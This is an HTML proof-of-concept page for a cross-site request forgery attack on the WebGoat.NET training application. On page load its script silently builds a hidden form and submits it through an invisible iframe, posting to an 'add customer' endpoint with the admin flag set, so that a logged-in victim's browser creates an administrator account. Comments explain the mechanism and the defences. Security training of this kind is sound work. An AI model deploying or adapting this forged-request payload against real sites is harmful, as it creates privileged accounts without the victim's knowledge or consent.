<!--
  CSRF proof-of-concept page for the WebGoat.NET training application (target is
  localhost:3282). When a logged-in victim loads this page, the script below
  builds a hidden form and auto-submits it cross-site; the request goes through
  only if the target does not bind the form to the victim's session with an
  unpredictable anti-forgery token (and the session cookie is sent cross-site,
  i.e. not SameSite=Lax/Strict).
  Not a complete document: no <!doctype>, <html lang>, <meta charset> or <title>.
-->
<head>
</head>
<body>
<script type="text/javascript">
// Build a form with one hidden input per entry of `params`, attach it to the
// document, give it a hidden iframe as target (so the response never becomes
// visible), and submit it.
//   method - HTTP method placed in the form's method attribute
//   path   - absolute URL placed in the form's action attribute
//   params - plain object; each own key becomes a hidden input name/value pair
// Returns nothing; side effects are the appended form and iframe and the
// navigation of the iframe.
function sendRequest(method, path, params) {
var form = document.createElement("form");
form.setAttribute("method", method);
form.setAttribute("action", path);
form.setAttribute("target", "hidden-form");
// Keep a reference to the native submit() before any inputs are added: a form
// control named "submit" would shadow the method. None of the parameters below
// is named "submit", so this is purely defensive here.
form.__submit = form.submit;
// for...in also walks inherited enumerable properties; fine for the object
// literal passed below, but not safe for arbitrary objects.
for (var key in params)
{
var field = document.createElement("input");
field.setAttribute("type", "hidden");
field.setAttribute("name", key);
field.setAttribute("value", params[key]);
form.appendChild(field);
}
document.body.appendChild(form);
// The iframe is created after the form but before submit(); the browser
// resolves target="hidden-form" by name at submission time.
var frame = document.createElement("iframe");
frame.setAttribute("style", "display:none");
frame.setAttribute("name", "hidden-form");
document.body.appendChild(frame);
form.__submit();
}
// Payload for the "add customer" form. __VIEWSTATE and __EVENTVALIDATION are
// sent empty: the request is only accepted if the server does not validate them
// against the page/session. Note the IsAdmin checkbox value "on" — the
// privilege flag is entirely client-supplied, which is what makes this CSRF
// worth defending against (session-bound anti-forgery token, SameSite cookies,
// and server-side authorization of the admin flag rather than trusting the form).
sendRequest('POST', 'http://localhost:3282/WebGoatCoins/AddNewCustomer.aspx',
{'__VIEWSTATE':'',
'__EVENTVALIDATION':'',
'ctl00$BodyContentPlaceholder$Username':'test',
'ctl00$BodyContentPlaceholder$Email':'test@test.com',
'ctl00$BodyContentPlaceholder$Password':'test',
'ctl00$BodyContentPlaceholder$IsAdmin':'on',
'ctl00$BodyContentPlaceholder$CreateCustomerButton':''});
</script>
</body>